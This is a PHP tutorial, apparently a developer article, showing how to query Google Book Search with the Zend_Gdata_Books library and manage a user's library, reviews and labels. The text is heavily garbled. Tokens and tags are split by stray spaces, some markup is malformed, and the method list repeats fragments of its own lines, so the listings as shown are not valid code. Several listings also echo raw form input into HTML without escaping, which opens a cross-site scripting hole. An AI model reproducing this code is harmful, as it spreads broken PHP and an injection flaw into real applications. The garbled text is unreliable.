< html xmlns= " http://www.w3.org/1999/xhtml " xml:lang= " en " lang= " en " > < head > < title > Searching for book titles < / title > </head > < body > < h2 ><? php echo $ feed -> title ; ?></h2 > < div > <? php echo $ feed -> totalResults ; ?> result (s ) found . </ div > < div id =" results " ) < ol > <? php foreach ( $ feed as $ entry ) : ?> < li > <? php echo $ entry -> getTitle ( ) ; ?> </li > <? php endforeach ; ?> </ ol > </div > </body > </html >
Listing 2 first loads the Zend class libraries , and then initializes an instance of the Zend_Http_Client class .
This client is provided with the user credentials needed to create an authenticated connection to the Google Book Search service .
Once an authenticated connection is created , a new instance of the Zend_Gdata_Books class is initialized ; this class serves as the control point for all subsequent interaction with the Google Book Search Data API .
The Zend_Gdata_Books method that you 're most likely to use is the getVolumeFeed ( ) method , which returns a feed of book titles matching a search query .
This method is passed an instance of a configured Zend_Gdata_Books_VolumeQuery class , with the query string set through the setQuery ( ) class method .
The response to the getVolumeFeed ( ) method is an Atom feed similar to the one displayed in Listing 1 ; this feed is automatically parsed and converted into an array of Zend_Gdata_Books_VolumeEntry objects , each representing one < entry > in the feed .
It 's now a simple matter to iterate over this array , retrieve the details of each entry using object properties , and turn it into an HTML page .
Figure 1 demonstrates the output you might see — a list of all books matching the keyword ' robert crais ' :
Figure 1 .
The result of a primitive Google Books API search
With this basic understanding in place , it 's quite easy to modify Listing 2 to make it more interactive .
Listing 3 demonstrates , adding a search form that can be used to perform a user - supplied book search query :
Listing 3 : Retrieving search results matching user - supplied keywords
<? php if ( isset ( $ _POST [ ' submit ' ] ) ) { // load Zend Gdata libraries require_once ' Zend/ Loader.php ' ; Zend_Loader::loadClass (' Zend_Gdata_Books ' ) ; Zend_Loader::loadClass (' Zend_Gdata_Books_VolumeQuery ' ) ; Zend_Loader::loadClass (' Zend_Gdata_ClientLogin' ) ; // set credentials for ClientLogin authentication $ user = " xxx@gmail.com " ; $ pass = " secret " ; try { // perform login $ client = Zend_Gdata_ClientLogin::getHttpClient ( $user , $ pass , ' print ' ) ; $ client->setHeaders ( 'X - Forwarded - For ' , $ _SERVER [ ' REMOTE_ADDR ' ] ) ; $ books = new Zend_Gdata_Books ( $ client ) ; // prepare and execute search query $ query = new Zend_Gdata_Books_VolumeQuery ; $ query->setQuery( urlencode($ _POST ['q ' ] ) ) ; $ feed = $ books -> getVolumeFeed ( $ query ) ; } catch ( Exception $ e ) { die ( ' ERROR : ' . $ e->getMessage ( ) ) ; } } ? >
<!
DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN " " http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd " >
< html xmlns= " http://www.w3.org/1999/xhtml " xml:lang= " en " lang= " en " > < head > < title > Searching for book titles < / title > </head > < body > < h2 > Search </ h2 > < form method= " post " action= " <? php echo $ _SERVER [ ' PHP_SELF ' ] ; ? > " >
Search for : < input type =" text " name= " q " value= " <? php echo isset ( $ _POST ['q ' ] ) ? $ _POST ['q ' ] : '' ; ? > " />
< input type =" submit " name = " submit " value = " Go " /> </ form > <? php if ( isset ( $ feed ) ) : ?> < h2 > Search results for '<? php echo $ _POST ['q ' ] ; ?>'</h2 > < div > <? php echo $ feed -> totalResults ; ?> result (s ) found . </ div > < div id =" results " ) < ol > <? php foreach ( $ feed as $ entry ) : ?> < li > < a href= " <? php echo $ entry->getInfoLink ()-> getHref ( ) ; ? > " > <? php echo $ entry -> getTitle ( ) ; ?></a> </li > <? php endforeach ; ?> </ ol > </div > <? php endif ; ?> </ body > </html >
Figure 2 demonstrates an example of the output generated by a search for ' indian cooking ' :
Figure 2 .
The result of a primitive Google Books API search
You 'll notice one addition in Listing 3 : the use of the Zend_Gdata_Books_VolumeEntry :: getInfoLink ( ) method , which returns a link to the book information page on the Google Book Search Web site .
Clicking this link will redirect the user to a page that contains , among other things , a detailed book description and user reviews .
Figure 3 has an example of what one such page looks like :
Figure 3 . A book detail page
It 's also worth pointing out that the query string passed to the Google Book Search Data API must be a URL - encoded string .
You 'll see that this is done in both the previous listings , with PHP 's urlencode ( ) method .
Retrieving detailed book information
As discussed in Listing 1 , the volume feed returned by the Google Book Search Data API contains a fair amount of information , apart from the book title : the author and publisher names , the ISBN number , the number of pages , the subject , and so on .
With Zend_Gdata_Books , all of this information is represented as a set of objects , which you can access and manipulated within the scope of a PHP script to create a more informative search results page .
To illustrate , consider Listing 4 :
Listing 4 : Retrieving book details
<? php if ( isset ( $ _POST [ ' submit ' ] ) ) { // load Zend Gdata libraries require_once ' Zend/ Loader.php ' ; Zend_Loader::loadClass (' Zend_Gdata_Books ' ) ; Zend_Loader::loadClass (' Zend_Gdata_Books_VolumeQuery ' ) ; Zend_Loader::loadClass (' Zend_Gdata_ClientLogin' ) ; // set credentials for ClientLogin authentication $ user = " xxx@gmail.com " ; $ pass = " secret " ; try { // perform login $ client = Zend_Gdata_ClientLogin::getHttpClient ( $user , $ pass , ' print ' ) ; $ client->setHeaders ( 'X - Forwarded - For ' , $ _SERVER [ ' REMOTE_ADDR ' ] ) ; $ books = new Zend_Gdata_Books ( $ client ) ; // prepare and execute search query $ query = new Zend_Gdata_Books_VolumeQuery ; $ query->setQuery( urlencode($ _POST ['q ' ] ) ) ; $ feed = $ books -> getVolumeFeed ( $ query ) ; } catch ( Exception $ e ) { die ( ' ERROR : ' . $ e->getMessage ( ) ) ; } } ? >
<!
DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN " " http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd " >
< html xmlns= " http://www.w3.org/1999/xhtml " xml:lang= " en " lang= " en " > < head > < title > Searching for book titles < / title > < style > . entry { height : 120 px ; border - bottom : dashed silver 2 px ; padding - top : 10 px ; } . thumbnail { float : left ; border : solid black 2 px ; padding : 2 px ; margin - right : 10 px ; } .desc { font - style : italic ; } . small { font - size : smaller ; } </style > </head > < body > < h2 > Search </ h2 > < form method= " post " action= " <? php echo $ _SERVER [ ' PHP_SELF ' ] ; ? > " >
Search for : < input type =" text " name= " q " value= " <? php echo isset ( $ _POST ['q ' ] ) ? $ _POST ['q ' ] : '' ; ? > " />
< input type =" submit " name = " submit " value = " Go " /> </ form > <? php if ( isset ( $ feed ) ) : ?> < h2 > Search results for '<? php echo $ _POST ['q ' ] ; ?>'</h2 > < div > <? php echo $ feed -> totalResults ; ?> result (s ) found .
</div > < div id =" results " > <? php $ x = 1 ; ?> <? php foreach ( $ feed as $ entry ) : ?> <? php // print_r( $entry ) ; $ book = new stdClass ; // get title if ( is_array ( $entry-> getTitles ( ) ) ) { foreach ( $ entry -> getTitles ( ) as $ title ) { $ book -> titles [ ] = $ title->getText ( ) ; } } // get authors if ( is_array ( $entry->getCreators ( ) ) ) { foreach ( $ entry -> getCreators ( ) as $ creator ) { $ book -> authors [ ] = $ creator -> getText ( ) ; } } // get publishers if ( is_array ( $entry->getPublishers ( ) ) ) { foreach ( $ entry -> getPublishers ( ) as $ publisher ) { $ book -> publishers [ ] = $ publisher -> getText ( ) ; } } // get publication date if ( is_array ( $entry -> getDates ( ) ) ) { $ arr = $ entry -> getDates ( ) ; $ book -> pubdate = ( is_object ( $arr [ 0 ] ) ) ? $ arr [ 0 ]->getText ( ) : ' Unspecified ' ; } // get ISBN numbers if ( is_array ( $entry-> getIdentifiers ( ) ) ) { foreach ( $ entry -> getIdentifiers ( ) as $ id ) { if ( preg_match ( ' / ISBN / ' , $ id->getText ( ) ) ) { $ book -> isbn [ ] = $ id->getText ( ) ; } } } // get first subject if ( is_array ( $entry->getSubjects ( ) ) ) { $ arr = $ entry -> getSubject s ( ) ; $ book -> subject = is_object ( $ arr [ 0 ] ) ? $ arr [ 0 ]->getText ( ) : ' Unspecified ' ; } // get first description if ( is_array ( $entry->getDescriptions ( ) ) ) { $ arr = $ entry -> getDescriptions ( ) ; $ book - > desc = is_object ( $ arr [ 0 ] ) ? $ arr [ 0 ]->getText ( ) :
' No description available ' ; } ?> < div class = " entry " > < div class = " thumbnail " > < img src= " <? php echo ( $ entry->getThumbnailLink ( ) ) ?
$ entry->getThumbnailLink ()->getHref ( ) : '' ; ? > " /> </div> < div class = " data " > <? php echo $ x ; ?>. <? php echo ucwords ( @implode ( ' : ' , $ book -> titles ) ) ; ?>< br/> <? php echo @implode( ' , ' , $ book -> authors ) ; ?> | <? php echo @implode( ' , ' , $ book -> publishers ) ; ?> | <? php echo $ book -> subject ; ?> | <? php echo date ( 'd M Y ' , strtotime ( $ book -> pubdate ) ) ; ?> < br/> < span class = " desc " ><? php echo $ book -> desc ; ?></ span > < br/> < span class= " small " ><? php echo @implode( ' , ' , $ book - > isbn ) ; ?> | < a href= " <? php echo $ entry->getInfoLink ()-> getHref ( ) ; ? > " >
More information </ a> </ span > </div> </div > <? php $ x++ ; ?> <? php endforeach ; ?> <? php endif ; ?> </ body > </html >
Listing 4 introduces a number of new methods of the Zend_Gdata_Books_VolumeEntry class .
Here 's a quick list of the important ones :
The getDates ( ) method returns the publication date of the book
method returns the publication date of the book The getCreators ( ) method returns the names of the authors
method returns the names of the authors The getPublishers ( ) method returns the names of the publishers
method returns the names of the publishers The getSubjects ( ) and getDescriptions ( ) methods return the book subjects and description
and methods return the book subjects and description The getTitles ( ) method returns the book title ( and sub - title , if present )
method returns the book title ( and sub - title , if present ) The getIdentifiers ( ) method returns an array of the ISBN - 10 and ISBN - 13 numbers for the book , as well as its Google Book Search record ID
method returns an array of the ISBN - 10 and ISBN - 13 numbers for the book , as well as its Google Book Search record ID The getThumbnailLink ( ) method returns the URL to a thumbnail image of the book cover
method returns the URL to a thumbnail image of the book cover The getVolumeId ( ) method returns the unique volume identifier of the book within the Google Book Search service
All of these methods return an array of objects , corresponding to the various Dublin Core metadata elements ; it 's then up to the developer to access the elements of each array and use the information within it to reconstitute the search result .
Figure 4 illustrates an example of the result .
Figure 4 .
The result of a Google Books API search , with search results enhanced to include a cover image and additional book data
Using query filters
You might have noticed that , in all the previous examples , the search results feed only contains 10 entries , even though the < openSearch : > elements actually indicate a much higher number of matches .
This is because , by default , Google Book Search feeds are limited to 10 matches per feed .
This is by no means set in stone ; you can easily customize the API output by adding some of the following parameters to your REST query :
The start - index parameter , which specifies the start offset for the entries in a feed
parameter , which specifies the start offset for the entries in a feed
The max - results parameter , which specifies the number of entries in a feed
parameter , which specifies the number of entries in a feed
The min-viewability parameter , which specifies whether feed entries only include those books for which a partial or complete preview exists
In addition to these parameters , you can also add additional filters to a search query to search for books by title , author , publisher , language , subject , description , or ISBN number .
Listing 5 illustrates how this may be done :
Listing 5 : Filtering search results by author , title and viewability
<? php if ( isset ( $ _POST [ ' submit ' ] ) ) { // load Zend Gdata libraries require_once ' Zend/ Loader.php ' ; Zend_Loader::loadClass (' Zend_Gdata_Books ' ) ; Zend_Loader::loadClass (' Zend_Gdata_Books_VolumeQuery ' ) ; Zend_Loader::loadClass (' Zend_Gdata_ClientLogin' ) ; // set credentials for ClientLogin authentication $ user = " xxx@gmail.com " ; $ pass = " secret " ; try { // perform login $ client = Zend_Gdata_ClientLogin::getHttpClient ( $user , $ pass , ' print ' ) ; $ client->setHeaders ( 'X - Forwarded - For ' , $ _SERVER [ ' REMOTE_ADDR ' ] ) ; $ books = new Zend_Gdata_Books ( $ client ) ; // prepare and execute search query $ query = new Zend_Gdata_Books_VolumeQuery ; $ query Str = '' ; if ( ! empty ( $ _POST [ ' title ' ] ) ) { $ queryStr .= '+intitle:'.urlencode( $ _POST [ ' title ' ] ) ; } if ( ! empty ( $ _POST [ ' author ' ] ) ) { $ queryStr .= '+inauthor:'.urlencode($ _POST [' author ' ] ) ; } $ query ->setQuery ( $ queryStr ) ; $ query ->setMinViewability ( $ _POST ['v ' ] ) ; $ query->setMaxResults ( 20 ) ; $ feed = $ books -> getVolumeFeed ( $ query ) ; } catch ( Exception $ e ) { die ( ' ERROR : ' .
$ e->getMessage ( ) ) ; } } ? >
<!
DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN " " http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd " >
< html xmlns= " http://www.w3.org/1999/xhtml " xml:lang= " en " lang= " en " > < head > < title > Searching for book titles < / title > < style > . entry { height : 120 px ; border - bottom : dashed silver 2 px ; padding - top : 10 px ; } . thumbnail { float : left ; border : solid black 2 px ; padding : 2 px ; margin - right : 10 px ; } .desc { font - style : italic ; } . small { font - size : smaller ; } </style > </head > < body > < h2 > Search </ h2 > < form method= " post " action= " <? php echo $ _SERVER [ ' PHP_SELF ' ] ; ? > " >
Title : < input type =" text " name = " title " value= " <? php echo isset ( $ _POST [ ' title ' ] ) ?
$ _POST [ ' title ' ] : '' ; ? > " />
Author : < input type =" text " name = " author " value= " <? php echo isset ( $ _POST [ ' author ' ] ) ?
$ _POST [' author ' ] : '' ; ? > " />
Viewability : < select name= " v " > < option value= " none " >
Any </option > < option value= " partial_view " > Partial < / option > < option value= " full_view " >
Full </ option > </ select > < input type =" submit " name = " submit " value = " Go " /> </ form > <? php if ( isset ( $ feed ) ) : ?> < h2 > Search results for '<? php echo $ query -> getQuery ( ) ; ? >'
</h2 > < div > <? php echo $ feed -> totalResults ; ?> result (s ) found .
</div > < div id =" results " > <? php $ x = 1 ; ?> <? php foreach ( $ feed as $ entry ) : ?> <? php // print_r( $entry ) ; $ book = new stdClass ; // get title if ( is_array ( $entry-> getTitles ( ) ) ) { foreach ( $ entry -> getTitles ( ) as $ title ) { $ book -> titles [ ] = $ title->getText ( ) ; } } // get authors if ( is_array ( $entry->getCreators ( ) ) ) { foreach ( $ entry -> getCreators ( ) as $ creator ) { $ book -> authors [ ] = $ creator -> getText ( ) ; } } // get publishers if ( is_array ( $entry->getPublishers ( ) ) ) { foreach ( $ entry -> getPublishers ( ) as $ publisher ) { $ book -> publishers [ ] = $ publisher -> getText ( ) ; } } // get publication date if ( is_array ( $entry -> getDates ( ) ) ) { $ arr = $ entry -> getDates ( ) ; $ book -> pubdate = ( is_object ( $arr [ 0 ] ) ) ? $ arr [ 0 ]->getText ( ) : ' Unspecified ' ; } // get ISBN numbers if ( is_array ( $entry-> getIdentifiers ( ) ) ) { foreach ( $ entry -> getIdentifiers ( ) as $ id ) { if ( preg_match ( ' / ISBN / ' , $ id->getText ( ) ) ) { $ book -> isbn [ ] = $ id->getText ( ) ; } } } // get first subject if ( is_array ( $entry->getSubjects ( ) ) ) { $ arr = $ entry -> getSubject s ( ) ; $ book -> subject = is_object ( $ arr [ 0 ] ) ? $ arr [ 0 ]->getText ( ) : ' Unspecified ' ; } // get first description if ( is_array ( $entry->getDescriptions ( ) ) ) { $ arr = $ entry -> getDescriptions ( ) ; $ book - > desc = is_object ( $ arr [ 0 ] ) ? $ arr [ 0 ]->getText ( ) :
' No description available ' ; } ?> < div class = " entry " > < div class = " thumbnail " > < img src= " <? php echo ( $ entry->getThumbnailLink ( ) ) ?
$ entry->getThumbnailLink ()->getHref ( ) : '' ; ? > " /> </div> < div class = " data " > <? php echo $ x ; ?>. <? php echo ucwords ( @implode ( ' : ' , $ book -> titles ) ) ; ?>< br/> <? php echo @implode( ' , ' , $ book -> authors ) ; ?> | <? php echo @implode( ' , ' , $ book -> publishers ) ; ?> | <? php echo $ book -> subject ; ?> | <? php echo date ( 'd M Y ' , strtotime ( $ book -> pubdate ) ) ; ?> < br/> < span class = " desc " ><? php echo $ book -> desc ; ?></ span > < br/> < span class= " small " ><? php echo @implode( ' , ' , $ book - > isbn ) ; ?> | < a href= " <? php echo $ entry->getInfoLink ()-> getHref ( ) ; ? > " >
More information </ a> </ span > </div> </div > <? php $ x++ ; ?> <? php endforeach ; ?> <? php endif ; ?> </ body > </html >
In this revision of Listing 4 , the user is presented with separate search fields for title , author , and visibility .
Depending on the input received , the search query is constructed with appropriate modifiers and transmitted to the Google Book Search API .
Notice the setMinViewability ( ) and setMaxResults ( ) method , which provide an object - oriented interface to the min-viewability and max - results input parameters .
Figure 5 and Figure 6 illustrate the output of Listing 5 , the former displaying the result of a title search and the latter displaying the result of a combined author / title search .
Figure 5 . The result of a Google Books search , filtered by title
Figure 6 .
The result of a Google Books API search , filtered by author and title name
Accessing user libraries
In addition to allowing public searches , Google Book Search also allows authenticated users to create their own virtual library of books .
This " My Library " feature allows users to review and label books , and create and share book collections with other users .
Like other Google Book Search features , it is available through the Google Book Search Data API .
To see how the " My Library " feature works , log in to Google Book Search using your Google Account , enter a search term , and use the " Add to my library " link that appears next to each search result to begin creating a virtual library .
You can access this library at any time using the " My Library " link that appears in the top right corner of each page .
Figure 7 illustrates an example of one such user library :
Figure 7 .
A user library on the Google Books Web site
The contents of the authenticated user 's library can also be obtained as an Atom feed , suitable for parsing in a PHP application .
Like the volume feed described in Listing 1 , this feed contains a set of < entry > elements , each representing a book in the user 's library .
This feed can be parsed into a set of PHP objects through the Zend_Gdata_Books object 's getUserLibraryFeed ( ) method , and can then be used to generate an HTML view of the library .
Listing 6 illustrates :
Listing 6 : Retrieving user library contents
<? php // load Zend Gdata libraries require_once ' Zend/ Loader.php ' ; Zend_Loader::loadClass (' Zend_Gdata_Books ' ) ; Zend_Loader::loadClass (' Zend_Gdata_ClientLogin' ) ; // set credentials for ClientLogin authentication $ user = " xxx@gmail.com " ; $ pass = " secret " ; try { // perform login $ client = Zend_Gdata_ClientLogin::getHttpClient ( $user , $ pass , ' print ' ) ; $ client->setHeaders ( 'X - Forwarded - For ' , $ _SERVER [ ' REMOTE_ADDR ' ] ) ; $ books = new Zend_Gdata_Books ( $ client ) ; // get authenticated user 's library feed $ feed = $ books ->getUserLibraryFeed ( ) ; } catch ( Exception $ e ) { die ( ' ERROR : ' . $ e->getMessage ( ) ) ; } ?>
<!
DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN " " http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd " >
< html xmlns= " http://www.w3.org/1999/xhtml " xml:lang= " en " lang= " en " > < head > < title > Displaying a user 's library < / title > < style > . entry { height : 120 px ; border - bottom : dashed silver 2 px ; padding - top : 10 px ; } . thumbnail { float : left ; border : solid black 2 px ; padding : 2 px ; margin - right : 10 px ; } .desc { font - style : italic ; } . small { font - size : smaller ; } </style > </ head > < body > <? php if ( isset ( $ feed ) ) : ?> < h2 > My Library </ h2 > < div > <? php echo $ feed -> totalResults ; ?> result (s ) found .
</ div > < div id =" results " > <? php $ x = 1 ; ?> <? php foreach ( $ feed as $ entry ) : ?> <? php $ book = new stdClass ; // get title if ( is_array ( $entry-> getTitles ( ) ) ) { foreach ( $ entry -> getTitles ( ) as $ title ) { $ book -> titles [ ] = $ title->getText ( ) ; } } // get authors if ( is_array ( $entry->getCreators ( ) ) ) { foreach ( $ entry -> getCreators ( ) as $ creator ) { $ book -> authors [ ] = $ creator -> getText ( ) ; } } // get publishers if ( is_array ( $entry->getPublishers ( ) ) ) { foreach ( $ entry -> getPublishers ( ) as $ publisher ) { $ book -> publishers [ ] =
$ publisher -> getText ( ) ; } } // get publication date if ( is_array ( $entry -> getDates ( ) ) ) { $ arr = $ entry -> getDates ( ) ; $ book -> pubdate = ( is_object ( $arr [ 0 ] ) ) ? $ arr [ 0 ]->getText ( ) : ' Unspecified ' ; } // get ISBN numbers if ( is_array ( $entry-> getIdentifiers ( ) ) ) { foreach ( $ entry -> getIdentifiers ( ) as $ id ) { if ( preg_match ( ' / ISBN / ' , $ id->getText ( ) ) ) { $ book -> isbn [ ] = $ id->getText ( ) ; } } } // get first subject if ( is_array ( $entry->getSubjects ( ) ) ) { $ arr = $ entry -> getSubjects ( ) ; $ book -> subject = is_object ( $ arr [ 0 ] ) ? $ arr [ 0 ]->getText ( ) : ' Unspecified ' ; } // get first description if ( is_array ( $entry->getDescriptions ( ) ) ) { $ arr = $ entry -> getDescriptions ( ) ; $ book - > desc = is_object ( $ arr [ 0 ] ) ? $ arr [ 0 ]->getText ( ) :
' No description available ' ; } ?> < div class = " entry " > < div class = " thumbnail " > < img src= " <? php echo ( $ entry->getThumbnailLink ( ) ) ?
$ entry->getThumbnailLink ()->getHref ( ) : '' ; ? > " /> </div> < div class = " data " > <? php echo $ x ; ?>. <? php echo ucwords ( @implode ( ' : ' , $ book -> titles ) ) ; ?>< br/> <? php echo @implode( ' , ' , $ book -> authors ) ; ?> | <? php echo @implode( ' , ' , $ book -> publishers ) ; ?> | <? php echo $ book -> subject ; ?> | <? php echo date ( 'd M Y ' , strtotime ( $ book -> pubdate ) ) ; ?> < br/> < span class = " desc " ><? php echo $ book -> desc ; ?></ span > < br/> < span class= " small " ><? php echo @implode( ' , ' , $ book - > isbn ) ; ?> |
Added to library on : <? php echo ( $ entry -> getPublished ( ) ) ?
date ( 'd M Y ' , strtotime ( $entry->getPublished ( ) -> getText ( ) ) ) : '' ; ?> | < a href= " <? php echo $ entry->getInfoLink ()-> getHref ( ) ; ? > "
> More information </ a> </ span > </div> </div > <? php $ x++ ; ?> <? php endforeach ; ?> <? php endif ; ?> </ body > </html >
Most of this should be familiar to you from the previous sections of this article .
The script opens an authenticated connection to the Google Book Search service , initializes a Zend_Gdata_Books object , and uses the getUserLibraryFeed ( ) method to retrieve a feed containing a list of books in the user 's library .
This feed is represented as an array of PHP objects , and it is now a simple matter to iterate over the array , process each entry and display the results with appropriate HTML markup .
Figure 8 illustrates an example of the result :
Figure 8 .
The result of a Google Books API request for a user 's library feed
Adding books to user libraries
That takes care of retrieving the contents of a user 's library ... but what about adding new titles to it ?
With the Google Book Search Data API , you simply post an XML - encoded < entry > containing the book 's unique volume identifier to the user 's library feed .
Listing 7 has an example of what such a POST request might look like :
Listing 7 : An example POST request for adding a book to a user 's library
POST / books / feeds/users/me/collections/library/volumes
HTTP/1.1 Host : books.google.com
Connection : close User - Agent : MyCompany - MyApp-1.0 Zend_Framework_Gdata/1.9.0 authorization : GoogleLogin Content - Type : application / atom+xml Accept- encoding : identity Content - Length : 97 < atom: entry xmlns:atom= " http://www.w3.org/2005/Atom " >
< atom:id>BOOK_VOLUME_ID_HERE</atom:id> </ atom:entry >
To accomplish the same task with Zend_Gdata_Books , initialize a new Zend_Gdata_Books_VolumeEntry object , assign it the volume identifier , and attach it to the user 's library feed with the insertVolume ( ) method .
Listing 8 illustrates the code :
Listing 8 : Adding books to a user 's library
<? php // load Zend Gdata libraries require_once ' Zend/ Loader.php ' ; Zend_Loader::loadClass (' Zend_Gdata_Books ' ) ; Zend_Loader::loadClass (' Zend_Gdata_ClientLogin' ) ; // set credentials for ClientLogin authentication $ user = " xxx@gmail.com " ; $ pass = " secret " ; try { // perform login $ client = Zend_Gdata_ClientLogin::getHttpClient ( $user , $ pass , ' print ' ) ; $ books = new Zend_Gdata_Books ( $ client ) ; // add book to user 's library using volume ID $ id = ' BOOK_VOLUME_ID_HERE ' ; $ entry = new Zend_Gdata_Books_VolumeEntry ( ) ; $ entry ->setId( new Zend_Gdata_App_Extension_Id( $id ) ) ; $ books->insertVolume ( $entry , Zend_Gdata_Books : : MY_LIBRARY_FEED_URI ) ; // display success message echo " Volume added successfully with ID : $ id " ; } catch ( Exception $ e ) { die ( ' ERROR : ' . $ e->getMessage ( ) ) ; } ?>
Adding book reviews and labels
In addition to allowing users to add books to their library , the Google Book Search API also allows them to add reviews and labels to books .
Reviews and labels are stored as what Google calls " annotations " and , if you look back at Listing 1 , you 'll see that every entry includes an annotation URL .
To add a review or a label to a book , therefore , you simply need to create an XML - encoded < entry > for the book , attach the review and / or labels to this entry , and POST the entire thing to the book 's annotation URL .
Listing 9 has an example of what such a POST request might look like :
Listing 9 : An example POST request for adding a book review
POST / books / feeds/users/me/volumes
HTTP/1.1 Host : www.google.com
Connection : close User - Agent : MyCompany - MyApp-1.0 Zend_Framework_Gdata/1.9.0 authorization : GoogleLogin Accept - encoding : identity Content - Type : application / atom+xml Content - Length : 3291 < atom: entry xmlns:atom= " http://www.w3.org/2005/Atom " >
< openAccess xmlns= " http://schemas.google.com/books/2008 " value= " http://schemas.google.com/books/2008#disabled " /> < atom : category term = " http://schemas.google.com/books/2008#volume " scheme = " http://schemas.google.com/g/2005#kind "/>
< atom:id >
http://www.google.com/books/feeds/volumes/BOOK_VOLUME_ID_HERE
</ atom:id > < atom : link href= " http://bks7.books.google.com/books?id=BOOK_VOLUME_ID_HERE &printsec=frontcover&img=1&zoom=5&sig=ACfU3U0ayCK47roiq 7r_hf_Iy-tQ&source=gbs_gdata " rel= " http://schemas.google.com/books/2008/thumbnail " type=" image/x-unknown " /> < atom : link href= " http://books.google.com/books?id=BOOK_VOLUME_ID_HERE &ie=ISO-8859-1&source=gbs_gdata " rel= " http://schemas.google.com/books/2008/info " type =" text / html " /> < atom : link href= " http://www.google.com/books/feeds/users/me/volumes " rel= " http://schemas.google.com/books/2008/annotation " type=" application / atom+xml " /> < atom : link href= " http://books.google.com/books?id=BOOK_VOLUME_ID_HERE &ie=ISO -8859 -1 " rel=" alternate " type = " text / html " / > < atom : link href= " http://www.google.com/books/feeds/volumes/BOOK_VOLUME_ID_HERE
" rel= " self " type= " application / atom+xml " /> < atom: title type =" text " > The Two Minute Rule < / atom: title > < atom:updated >2009-12-28T10:15:44.000Z</atom:updated > < dc:creator xmlns:dc= " http://purl.org/dc/terms "
>
Robert Crais</dc:creator > < dc:date xmlns:dc= " http://purl.org/dc/terms ">2006-01-01</dc:date> < dc:format xmlns:dc= " http://purl.org/dc/terms "
>
Dimensions 10.8x17.2x3.0 cm </dc:format > < dc:format xmlns:dc= " http://purl.org/dc/terms ">465 pages</dc:format > < dc:format xmlns:dc= " http://purl.org/dc/terms ">book</dc:format> < dc:identifier xmlns:dc= " http://purl.org/dc/terms "
>BOOK_VOLUME_ID_HERE
</dc:identifier > < dc:identifier xmlns:dc= " http://purl.org/dc/terms "
>ISBN:1111111111 </dc:identifier > < dc:identifier xmlns:dc= " http://purl.org/dc/terms "
>ISBN:1111111111111 </dc:identifier > < dc:language xmlns:dc= " http://purl.org/dc/terms ">en</dc:language >
< dc:publisher xmlns:dc= " http://purl.org/dc/terms "
>
Pocket Books </dc:publisher > < dc:subject xmlns:dc= " http://purl.org/dc/terms "
>
Fiction / Action & Adventure </dc:subject > < dc:subject xmlns:dc= " http://purl.org/dc/terms "
>
Fiction / Suspense </dc:subject > < dc:subject xmlns:dc= " http://purl.org/dc/terms "
>
Fiction / Action & Adventure </dc:subject > < dc:title xmlns:dc= " http://purl.org/dc/terms " >
The Two Minute Rule </dc:title > < gbs:embeddability xmlns:gbs= " http://schemas.google.com/books/2008 " value= " http://schemas.google.com/books/2008#not_embeddable " />
< gd:rating xmlns:gd= " http://schemas.google.com/g/2005 " min= " 1 " max = " 5 " average = " 4.20 " /> < gbs:review xmlns:gbs = " http://schemas.google.com/books/2008 " >
This book is amazing - v!</gbs:review >
< gbs:viewability xmlns:gbs= " http://schemas.google.com/books/2008 " value= " http://schemas.google.com/books/2008#view_no_pages " /> </ atom:entry >
Listing 10 has an example of posting a review using the volume identifier of the target book and the Zend_Gdata library :
Listing 10 : Adding a book review
<? php // load Zend Gdata libraries require_once ' Zend/ Loader.php ' ; Zend_Loader::loadClass (' Zend_Gdata_Books ' ) ; Zend_Loader::loadClass (' Zend_Gdata_ClientLogin' ) ; // set credentials for ClientLogin authentication $ user = " xxx@gmail.com " ; $ pass = " secret " ; try { // perform login $ client = Zend_Gdata_ClientLogin::getHttpClient ( $user , $ pass , ' print ' ) ; $ books = new Zend_Gdata_Books ( $ client ) ; // add review to book $ id = ' BOOK_VOLUME_ID_HERE ' ; $ entry = $ books ->getVolumeEntry ( $id ) ; $ review = new Zend_Gdata_Books_Extension_Review ( ) ; $ review -> setText ( " This book is amazing - v ! " ) ; $ entry ->setReview ( $ review ) ; $ books->insertVolume ( $entry , $ entry->getAnnotationLink ( )-> getHref ( ) ) ; // display success message echo " Review successfully added with ID : $ id " ; } catch ( Exception $ e ) { die ( ' ERROR : ' . $ e->getMessage ( ) ) ; } ?>
In Listing 10 , the getVolumeEntry ( ) method is used to retrieve the current entry for a book using its volume identifier , and a Zend_Gdata_Books_Extension_Review object containing the review text is then attached to the entry through the setReview ( ) method .
The insertVolume ( ) method then takes care of creating the POST request and updating the entry on the Google servers .
In a similar vein , Google Book Search also allows users to tag , or " label " , each book with descriptive keywords .
This is a useful community feature that can produce more efficient and relevant search results .
Listing 11 has an example of how to programmatically attach these labels to a book entry :
Listing 11 : Adding book labels
<? php // load Zend Gdata libraries require_once ' Zend/ Loader.php ' ; Zend_Loader::loadClass (' Zend_Gdata_Books ' ) ; Zend_Loader::loadClass (' Zend_Gdata_ClientLogin' ) ; // set credentials for ClientLogin authentication $ user = " xxx@gmail.com " ; $ pass = " secret " ; try { // perform login $ client = Zend_Gdata_ClientLogin::getHttpClient ( $user , $ pass , ' print ' ) ; $ books = new Zend_Gdata_Books ( $ client ) ; // add labels to book $ id = ' BOOK_VOLUME_ID_HERE ' ; $ entry = $ books->getVolumeEntry ( $id ) ; $ entry->setCategory ( array ( new Zend_Gdata_App_Extension_Category ( ' crime ' , ' http://schemas.google.com/books/2008/labels'), new Zend_Gdata_App_Extension_Category ( ' suspense ' , ' http://schemas.google.com/books/2008/labels'), new Zend_Gdata_App_Extension_Category ( ' elvis cole ' , ' http://schemas.google.com/books/2008/labels') ) ) ; $ books->insertVolume ( $entry , $ entry->getAnnotationLink ( )->getHref ( ) ) ; // display success message echo " Labels successfully added for ID : $ id " ; } catch ( Exception $ e ) { die ( ' ERROR : ' .
$ e->getMessage ( ) ) ; } ?>
In Listing 11 , each label is represented as a Zend_Gdata_App_Extension_Category instance , and these instances are then attached to the book entry with the setCategory ( ) method .
The insertVolume ( ) method is then invoked to add the labels to the book entry in the Google Book Search database .
